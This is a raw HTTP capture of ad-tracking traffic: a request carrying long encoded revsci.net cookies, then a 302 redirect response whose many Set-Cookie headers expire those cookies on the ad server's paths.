NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etrK/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwM6qBXnbGGg1JT67wrbW+ySU7rogmEORPk7UwTymoz+IRwvFYky4FsOTLudHmb5jo8Y3+ZIgNcVdvXBaNNw=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bjrC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SZ7X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_evMS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OvdF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7Fof=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zYUJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YNkt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vvhk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J1Ps=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_b8FU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mB1L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sjxc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IDRv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ev9c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X4PT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__0fe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N0iX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_D9lG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L6z4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DHsK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RWWj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5sIM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BYLc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RLoX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qW9_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tUOz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X-Vm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iIbq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2iyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GmIq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DDwn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oq-t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GGsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RHZz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bpJH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FjqN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kTuc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1cgA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zj0S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__S9R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6dX6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ERpj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GXWN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nkS4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qHFS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gmtv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DsKn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TtGD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_34v8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ONLV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_h_EP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z35U=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ItMH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HIOU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j3RF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1HRX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcFY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZM6F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zfml=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s5cG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mnCe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bjrC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SZ7X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_evMS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OvdF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7Fof=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zYUJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YNkt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vvhk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J1Ps=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_b8FU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mB1L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sjxc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IDRv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ev9c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X4PT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__0fe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_N0iX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D9lG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L6z4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DHsK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RWWj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5sIM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BYLc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RLoX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qW9_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tUOz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X-Vm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iIbq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2iyk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GmIq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DDwn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oq-t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GGsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RHZz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bpJH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FjqN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kTuc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1cgA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zj0S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__S9R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6dX6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ERpj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GXWN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nkS4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qHFS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gmtv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DsKn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TtGD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_34v8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
